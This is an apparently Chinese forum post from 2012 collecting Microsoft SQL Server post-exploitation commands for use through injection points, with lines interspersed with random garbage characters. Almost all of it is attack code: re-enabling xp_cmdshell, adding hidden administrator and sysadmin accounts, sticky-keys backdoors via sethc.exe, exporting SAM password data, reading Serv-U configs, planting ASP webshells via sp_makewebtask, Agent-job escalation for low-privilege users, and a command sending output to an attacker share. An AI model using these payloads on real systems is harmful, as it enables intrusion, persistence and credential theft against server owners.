1 未能找到存储过程'master..xpcmdshell'. EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号+ B2 k+ ?! y: @2 d5 M
恢复方法:查询分离器连接后,% k5 L" ^1 S. M. ]$ ]" j
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
0 Z' N2 ]: R3 ?2 o" J/ @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' & @* _% [3 A D
然后按F5键命令执行完毕
0 J, c0 }3 u$ f% M
! y( {- t# w: L- x ~2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
' W6 v: a: ]* o& ^ q n5 j0 K恢复方法:查询分离器连接后,
" ^) M& X3 w7 k- c/ E第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
- [1 b; ~8 q/ k7 t第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'% \3 ^3 A! _1 Q
然后按F5键命令执行完毕6 \ M" h) c. ~, m) X1 P5 F1 A
2 f, l L8 n- ~3 t/ ^6 _
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ d: U3 Y) A2 x' l, i( J5 _; X$ ?恢复方法:查询分离器连接后,
1 u' R J+ u% j5 f2 R; M第一步执行:exec sp_dropextendedproc 'xp_cmdshell'0 [# @1 i- N5 o/ D, X
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
5 f2 |, @6 N! X3 c5 ]2 i% X$ r然后按F5键命令执行完毕
0 L6 w p( p/ n3 m- W; a; P& h- S( V2 V! W7 G, L$ J
4 终极方法.
1 F4 ]. B# U3 V( F* R) M; D如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
- ]! D/ W* l7 j4 a% _) T$ w查询分离器连接后,
! N4 J2 I# q% L P I0 f2000servser系统:
; x# o, ?8 X0 U! S- C8 F' S! Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'+ }% p( Y9 A( j5 \5 u$ L
3 i" J/ f0 T0 L% t/ l2 I# ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
( \5 @- S# ~0 t9 [, _4 Q" Y
7 `% G1 Z; J6 p0 I3 x# V' fxp或2003server系统:: [/ F% [$ k9 W& w
' z$ Q* E. W$ H7 f! O. e3 |
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'# i5 k5 A' _, ?5 k% s/ n/ i
5 H4 w; B: I4 L* N& Pdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
- ?0 _: ?6 \3 f- q" s+ q$ u" i1 J$ q
7 J. Z4 t/ n0 P9 X: c
' Y/ T8 {! C( |2 v7 P. Z& z五个SHIFT
0 }. _' | ]& Xdeclare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';5 W# H4 j% d H$ ^" u' H: V
* G: ^' W8 J3 O! F6 h3 }declare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; : m4 J6 m8 X7 Y
: R1 T# V. z) o; y
xp_cmdshell执行命令另一种方法) r" W3 u+ |& @2 @' x- X/ M4 u
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add'
. w7 n! P9 P: U4 S' z; X# N# S+ N6 g( x7 k# E0 W, F6 T5 o
判断存储扩展是否存在
0 n+ P- B" I; j; w9 wSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
" D1 x5 E3 g- S( P! \, i返回结果为1就OK
, e4 H7 {( ]1 p: d D
- C# f' v Y: E D5 X4 @. J
8 l; n/ D$ O! ^' g( X9 m上传xplog70.dll恢复xp_cmdshell语句:
( m2 C+ V) f) H1 A8 t& msp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'
3 [ {9 Z# a5 G/ ^+ J, y' A( i, X# K& \$ L |/ W
否则上传xplog7.0.dll/ ?+ y" i; D, E0 V6 E+ R# k
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
V3 N' m! {2 A6 U3 `
" a7 \4 L1 r! D. X! a# G% s8 ^' E! R+ l, y, I5 Q
% r5 ^& N- m! Q) [. s$ v
首先开启沙盘模式:
3 B) C: i+ j! |6 i& Dexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1) u7 l6 [- o2 \- U F8 |4 {
. f+ F# Y6 I/ Y2 n, t' t0 N
然后利用jet.oledb执行系统命令
; e1 ~' d3 X4 l' A: k1 \( Z9 J7 hselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')& ^( n1 S( o, n- `
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1-- 发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了
8 X' N2 e N+ E7 ^9 M7 y" B
5 H- M, C% b1 s0 x' o
/ Y+ X3 P: G* h6 x4 ]! z# ?
# V6 }/ U, M! \/ B7 m' U; I5 _1 w1 L恢复过程sp_addextendedproc 如下:
$ K; W$ N( P3 Dcreate procedure sp_addextendedproc --- 1996/08/30 20:13 7 E/ w( c5 f; P- `# P" h; s4 H
@functname nvarchar(517),/* (owner.)name of function to call */
3 p& m0 i" W# W+ d7 j@dllname varchar(255)/* name of DLL containing function */ % J/ X! @) l g
as
. c! O# e0 }* a0 uset implicit_transactions off " {2 I7 p2 H9 U# b" W4 g! L
if @@trancount > 0 ! k( u( I' s# J: P1 l
begin
+ B& Q/ J1 w( _9 eraiserror(15002,-1,-1,'sp_addextendedproc') " X- E. f# z% [1 R. T
return (1)
8 m4 H: P' s1 s% m* cend 8 ?7 p4 w( U, D- C" t% b1 R
dbcc addextendedproc( @functname, @dllname) 8 k4 P. `$ p* S* {
return (0) -- sp_addextendedproc
" k. b! V: c$ }! V0 k* AGO # H5 I& s* }0 _8 V/ v
* { F I3 [$ {6 r0 W5 J
* P$ m! R# V/ y* q" D; [' \/ V& T
& t1 s* {" B# L. W$ k, F- @
导出管理员密码文件
! C" r. ~% y4 m: ?sa默认可以读sam键.应该。
5 [* P. i( H4 S) R( e3 hreg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg" V) m) u9 F. X; a& g5 u
net user administrator test
! Y% u8 o2 H- Q7 \( h用administrator登陆.
6 c6 t1 ]# E( F! ]$ _) q% \, S用完机器后2 E! z! r9 R* S% T# ^7 v+ P
reg import c:\test.reg
9 w% x4 x- M6 ?+ a根本不用克隆.
7 j2 W9 k J. i! P. @找到对应的sid. . [9 d1 j+ d& \: Q
" j* m; l. r5 P4 w! k% x- h/ z
( c5 d* c# [3 }! C4 \8 S2 A, p2 ^, t& P
恢复所有存储过程
5 O) C3 e3 P1 _! @6 G( A( [use master + {1 j7 K8 H5 ~: p
exec sp_addextendedproc xp_enumgroups,'xplog70.dll'
3 v: x6 u/ A5 o6 T0 S- W( Q- Kexec sp_addextendedproc xp_fixeddrives,'xpstar.dll'
+ Q7 Q; _- ^! k# V% n) Y# Wexec sp_addextendedproc xp_loginconfig,'xplog70.dll' * y/ r8 }) R& q- A3 T5 b7 ?: f: _
exec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' + u4 k9 z( W2 |# \! ]" j# u$ |; t
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
- u& l9 O. B2 Z+ P" D& W+ S3 O, _exec sp_addextendedproc sp_OACreate,'odsole70.dll'
1 _2 ~6 u8 K0 i. J& M0 E; gexec sp_addextendedproc sp_OADestroy,'odsole70.dll'
1 s) ~3 @2 F' K5 m4 ?exec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll'
6 l+ X, _( p# g1 nexec sp_addextendedproc sp_OAGetProperty,'odsole70.dll' : R- W! Z& ~0 Q! {' c# l' N- R
exec sp_addextendedproc sp_OAMethod,'odsole70.dll' r6 s' s" _$ |/ s z, h
exec sp_addextendedproc sp_OASetProperty,'odsole70.dll' - T$ y$ \9 q; k
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
4 s' @9 Z* {6 T/ Cexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll'
4 T X; J( Z2 K: h# ?exec sp_addextendedproc xp_regdeletekey,'xpstar.dll' z4 C" w# ` ?
exec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
. X1 x: ^. E$ U+ k6 f$ T* D4 e/ r# Kexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' $ C. X3 W; I( ^! k1 b/ g b& Y
exec sp_addextendedproc xp_regread,'xpstar.dll' - z/ r5 g% X" i( J3 }9 M
exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' , M1 r; S, h. Z6 B8 i( v
exec sp_addextendedproc xp_regwrite,'xpstar.dll' ; a7 D& r3 N! X0 \# ?
exec sp_addextendedproc xp_availablemedia,'xpstar.dll'9 L9 c7 G. B8 f+ R1 A5 ?9 w* L8 d8 @; R
7 p' d D4 x4 v b$ K. M; V
9 l% R! P7 R7 ~0 I% A建立读文件的存储过程
P( O u( w5 [( x! VCreate proc sp_readTextFile @filename sysname. m! C+ w% @. h! l5 n" v
as$ D( [- u* V2 O1 m- Q
6 |& |# z+ ?& @1 E. d; c7 I* f
begin
& U' D# |8 d$ U( K' s5 p set nocount on
: p6 f: Y( j V3 g1 \( b3 M, } Create table #tempfile (line varchar(8000))$ v+ i2 D4 ~/ Y/ b) z5 m5 R
exec ('bulk insert #tempfile from "' + @filename + '"')
% X. w( ?; j& [/ p# ` select * from #tempfile ^ z3 N: m1 f5 C8 j) Y8 |
drop table #tempfile
7 p! `; A5 y4 a) h" Z) _( Y! oEnd
; }2 _7 X- _3 U* |9 M o& M
y0 ~* r/ s1 |exec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件& h3 h: N1 o) D3 T: e
查看登录用户
0 @ b! _4 O# r$ `- u! SSelect * from sysxlogins/ J2 n$ @, D( x3 [
) E: d: S( D) D( x1 |2 U6 B
把文件内容读取到表中
" w5 n( U0 i. ~. i9 Y; ]BULK INSERT tmp from "c:\test.txt"
, H d! S E' q* H! P1 P! C8 Q. adElete from 表名 清理表里的内容7 m" w$ d+ Z/ v/ Z! ]6 L
create table b_test(fn nvarchar(4000));建一个表,字段为fn
6 g) k% u0 x# \/ O7 B% q$ Q/ n T
' k$ R L! l3 n3 t# R; F/ Q- N& A2 t5 ~4 _& ]( a K7 j
加sa用户7 \. J" D4 X' p0 f e
exec master.dbo.sp_addlogin user,pass;
- s M8 O6 \) d- i) U& k/ _# eexec master.dbo.sp_addsrvrolemember user,sysadmin6 `1 D+ Z# H2 m4 p1 U. r
5 e9 _' t2 L$ Y/ m& @1 D$ Z+ x6 X- B( A
4 H2 S5 [: L+ i; x* I' N$ R
读文件代码
4 O- Z2 Y: u9 _4 Q) {$ d+ ]7 M: W+ Ndeclare @o int, @f int, @t int, @ret int
9 S; t6 F1 ?5 T% k' g2 F+ p, ndeclare @line varchar(8000)
8 \% u: d3 y' k; `+ D' g1 b/ Hexec sp_oacreate 'scripting.filesystemobject', @o out
! k, G# p9 V4 _0 m0 R! p2 ]exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1
5 j9 k1 u% k" ?! {$ @. Zexec @ret = sp_oamethod @f, 'readline', @line out0 `, p0 B8 g% Z: q
while( @ret = 0 )
8 g: @' M+ S) s/ s0 tbegin
! I. D9 ]9 q- w2 ]7 ]( Eprint @line
! W' y( ^( z) B$ sexec @ret = sp_oamethod @f, 'readline', @line out: F5 v: E/ ~. {) k
end
! ?& Q# ?& |# d- ^0 H6 q2 G3 Y" K6 W9 |2 n, z
( `3 h V$ @- }
写文件代码:
2 @4 z# x/ f# k& [declare @o int, @f int, @t int, @ret int
# u# p b* M. Y f: uexec sp_oacreate 'scripting.filesystemobject', @o out7 h( Z8 c( O5 a8 j
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1. w/ j( d. Y3 j; C7 t
exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》9 B+ e5 {# E; m& _6 n | m
) K1 {* k, h5 @; V# X V6 @4 \
+ l& M7 v6 j9 _2 e9 e# s4 P( z
添加lake2 shell
1 _7 U+ C' S( A" `5 T( esp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'
' Q, m& l; x% N& G' R5 u7 g3 wsp_dropextendedproc xp_lake2
4 e- B. J: T9 U3 V8 V0 d* R- nEXEC xp_lake2 'net user'
% O$ F& O \/ ^8 w! Y2 \) e D( c! h c- n" j
" X* e# g. d3 P: \得到硬盘文件信息 3 [0 c1 a O- r8 T1 e
--参数说明:目录名,目录深度,是否显示文件 : q/ M+ j6 W0 d! a) H8 D, Z
execute master..xp_dirtree 'c:' , V0 f) |+ e; N5 v- Y2 h% j4 Q
execute master..xp_dirtree 'c:',1
, [/ w- u$ s5 U! `- j/ b* Cexecute master..xp_dirtree 'c:',1,1
- d. }! a2 L4 T7 m4 D4 ?
`& c) @$ }1 |& J# Q t! A4 k, f, a9 T# O
读serv-u配置信息
8 T3 e7 [ F( H9 x" j: L% ^& s3 ]exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'0 r# L+ [! s7 i
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
1 S1 ]6 M/ l/ x% }
; L; n' ]$ k+ D! Y! c, n通过xp_regwrite写SHIFT后门
3 w# G) r/ ^' a% t8 x7 F* J& mexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--6 `: K3 v; @! @: ]8 @9 P' y
, a8 @) k; E5 ?1 X: `- {; ?
# e4 }. w' r. j9 i9 Z6 `& F3 s) ^' M
3 I/ u3 I5 X/ I找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';
- f$ i1 C$ N; X3 Y- h; lexec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了
7 L% i7 i" N u& m2 _2 S% W' V% M' B7 d! y0 F0 `
EXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'2 _! L$ M( D. N/ i; L& H
% ^( O4 X3 w8 B6 U, }
% |+ x4 p1 Z J- T' ~6 g7 ^
& o2 b* K' G& |. A& u% X5 F
sql server 2005下开启xp_cmdshell的办法/ W$ M. ?) l# m+ M
) w9 E( w2 a5 |+ z% P+ c& x1 [
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
0 ?& M0 a* ^1 [5 p; q) t& x2 |7 l; x2 v) W9 e6 S
SQL2005开启'OPENROWSET'支持的方法:
, ^' q; f$ \( v# t# ~( S* {% x, b& S6 g& L w8 ~& ?. {
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
" o* s6 d# x9 q8 b7 w+ v
e- U3 h8 w; K* _% pSQL2005开启'sp_oacreate'支持的方法:8 m, ?/ {+ [+ _/ i& t* X
+ u5 \9 i* I$ m$ m. G+ g% ~exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;& E4 O- X4 O$ K0 X- a& u. n3 J
7 K' K4 p( }9 x$ _1 E2 [
) Q/ q' H! e) u# j2 t3 X+ g( I5 l& Q" A! [
4 r6 r; D; l, {/ S( Q( v2 l
+ M5 w, |: ?6 [# b
8 t& E) u( s+ |! a7 V: {3 m/ r, q; ~# z
& O2 ^+ o6 Z# x8 G1 V, R) |8 d% @
3 c0 t+ U9 l5 e- P! R7 \% x
$ r: a/ j/ f; b
$ S/ a, f" ~' P5 c9 M$ i
5 G5 ~* R( w' l( D
7 n8 }& t- U7 t8 B5 w i+ N
. Z6 B* b# m) |4 ~6 l: x
! L1 c9 n" h4 ?7 Z% B4 f
i3 Q8 F. U k. W8 r2 {; B# q$ h( c* _3 D
$ l4 E; D: U% r: K( }. s) ?! L/ W" u2 ] ]0 }( r
3 B3 O% Z' L3 Q* I( b3 ]9 y6 o# D
' N! _8 o" w3 G- D
2 Y! B! N% B) ^
以下方面不知道能不能成功暂且留下研究哈:
3 _7 {. G! g: ]2 S2 w7 a4)
! [ N" O5 q* H% L" ^( p1 buse msdb; --这儿不要是master哟
3 Q9 f9 T( \7 K8 Uexec sp_add_job @job_name= czy82 ;
: m( o7 c- R0 wexec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;
" |: N3 ^$ j+ W/ P1 h# l: G3 gexec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;
" ]0 z7 t- B' v/ U: `7 P5 @; ? ]exec sp_start_job @job_name= czy82 ;
1 S4 A& f# {# M0 l( E. _: L
1 g2 M/ p; @% B* R利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以! M2 m2 ^# _" }7 ~2 T, ^
执行tsql语句了.
* j8 Y( r4 ^: j* D7 e' J% _* A# s对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名
2 ~' l/ O* J! f; r5 r# j第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)
6 C! M* a2 a, N- x3 W' _net start SQLSERVERAGENT
& {! j" x5 i1 V: ^" `9 T. {' {1 T) s2 W9 n
对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的
$ X' T( t2 G4 oUSE msdb
9 k* C4 p \. N6 C2 nEXEC sp_add_job @job_name = GetSystemOnSQL ,
. t/ d6 c/ I, z+ ?' k# J, R; _@enabled = 1,
, q5 s8 h* n" A9 O) u1 N. B@description = This will give a low privileged user access to
- g- h: g& a$ s8 Y' g( ]xp_cmdshell ,
5 ^& e8 n$ ]* L( K# R3 b@delete_level = 1& Z! _0 o- }! |7 u
EXEC sp_add_jobstep @job_name = GetSystemOnSQL ,$ z8 O; ]# }2 l; J2 Q
@step_name = Exec my sql ,* j& L' u+ @7 e% Q
@subsystem = TSQL ,$ @0 y" H3 ~+ N2 M* y' Z5 |/ d. {$ q
@command = exec master..xp_execresultset N select exec+ I4 i; u6 f9 p) v4 Y! y+ E0 v
master..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master ! X2 F2 y" n1 X/ X
EXEC sp_add_jobserver @job_name = GetSystemOnSQL , {# m6 e" p0 m6 z4 X% t; d. q
@server_name = 你的SQL的服务器名
; z* U, s8 Z/ J( Q- gEXEC sp_start_job @job_name = GetSystemOnSQL : T! C9 t. l3 Q6 k' D5 C# _2 N8 l
7 p t+ U$ G7 r6 D1 z0 p" {
不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
$ k1 [3 {7 R1 c/ K' M2 t才让我们可以以public执行xp_cmdshell6 u+ C. k8 n, K' k9 A3 v3 L8 j
% C5 G$ c. v3 H* o" K5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)/ l9 j3 N h9 d6 o' q3 q h1 Y
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=2968
4 E! h# W* ^8 B8 o% ], T/ `9 _/ E3 B, `8 w( C8 V8 q
USE msdb4 W8 U. Y$ m Q9 s) e* _
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
9 y# N# R) B4 A, I) u@enabled = 1,, H7 A9 I0 i$ l# _6 m$ G2 g
@description = This will create a file called c:\sqlafc123.txt ,. I2 ^* k2 h# `: y
@delete_level = 1
% l; d* }" z* ]EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,8 e4 {3 [1 K7 }$ G
@step_name = SQLAFC ,. I& f8 |6 U; H" m4 u5 s
@subsystem = TSQL ,' ]$ z3 \0 h' p$ J
@command = select hello, this file was created by the SQL Agent. ,6 s3 ?& n# w5 z" A' F
@output_file_name = c:\sqlafc123.txt 1 v0 v4 H9 Q0 @9 Y1 J9 e3 p
EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
! v9 ?( `7 F. k7 r$ g@server_name = SERVER_NAME - T+ n& Z" _& r9 _" B+ M' T# K5 z3 g U
EXEC sp_start_job @job_name = ArbitraryFilecreate
@) \# b9 J$ O' H$ W' X
9 t) c( j: `# V+ W如果subsystem选的是:tsql,在生成的文件的头部有如下内容& z, U: `$ k7 q
* L# J! c- Y+ q; x
??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19" u* ~+ g$ ]+ X) `
----------------------------------------------: c: g, u: Y+ l6 D' P
hello, this file was created by the SQL Agent.& I' m; {: E+ j; f- F9 U
7 K3 t/ _ t' i& C(1 ?????)
- C9 Q# D$ D$ _' l9 u" {! c' y+ V3 K* w
所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员/ ]3 g* I0 ~" B1 L0 l' m* |0 \
命令的vbs文件到启动目录!( I; P {) V' l; t$ p
# M6 P: O; J$ |: `! d" Z
6)关于sp_makewebtask(可以写任意内容任意文件名的文件)1 C$ \2 M4 k3 ?) d* w
关于sp_MScopyscriptfile 看下面的例子/ H3 t2 n! j, h! K& r
declare @command varchar(100)
) A/ D# E( d$ C" \( c: |declare @scripfile varchar(200) 1 ~! f' y4 E6 H! P2 O
set concat_null_yields_null off
' o) S& ~7 B* J; |! g. S3 ^) P. Bselect @command= dir c:\ > "\\attackerip\share\dir.txt" + q3 n. ?1 G/ k2 Q7 P. h
select @scripfile= c:\autoexec.bat > nul" | @command | rd " H6 E6 D* t# s x/ i' ^9 a, E
exec sp_MScopyscriptfile @scripfile ,
! T& E1 Z. [# F, A7 _1 w% P2 C8 l# h0 H4 a1 }2 y
这两个东东都还在测试试哟
, Y6 A- N0 X- r" A* a让MSSQL的public用户得到一个本机的web shell
" A+ b& |4 }' O
8 ^* |' {7 `0 j" R( @sp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,
8 p2 _7 z* _3 E--@query= select <img src=vbscript:msgbox(now())> 0 x8 [- v: X' g. u7 v3 K$ i
--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%>
+ v! `5 Z3 p2 ^1 F3 j" ~@query= select
& Q1 ^4 }; _" }8 e" N<%On Error Resume Next
# D3 f" i" g2 P6 D; Q9 MSet oscript = Server.createObject("wscript.SHELL")
6 A! z) F+ \) F; b' o- i& ?Set oscriptNet = Server.createObject("wscript.NETWORK") 9 [. _' e* G0 C( ]8 ]
Set oFileSys = Server.createObject("scripting.FileSystemObject") * }( z% a/ O q/ I
szCMD = Request.Form(".CMD")
/ {- e% c7 T+ j9 W/ c ]0 ? @If (szCMD <>"")Then
# E( J9 Y5 ` u; S# o$ a2 `* nszTempFile = "C:\" & oFileSys.GetTempName() " g1 A6 a$ i8 F8 k( k
Call oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
2 { w9 w8 m1 S# m5 s$ L' D$ vSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) 6 B3 R$ e( F1 {3 g" G8 K
End If %>
( m+ g- X4 Y* |<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method=" OST">
/ A/ T$ n x+ Z$ }# |% B. n<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">
: @% {( ]* M {4 v [</FORM><RE> 8 E! {4 s$ S, l$ o
<% If (IsObject(oFile))Then
$ t6 [; X( W! F6 Y& N/ ZOn Error Resume Next
, g& H2 J+ r$ F2 AResponse.Write Server.HTMLEncode(oFile.ReadAll)
( L0 N' \& R! BoFile.Close
. ^- V% G, \; \: E0 q6 e: r/ @Call oFileSys.deleteFile(szTempFile, True)
9 j* l$ N: R. qEnd If%> # P: f! u+ P& K' F1 u
</BODY></HTML> 3 e! k# s0 p6 M. c8 @+ J7 v8 d7 U
|
发表于 2012-9-15 14:37:30
收藏
支持
反对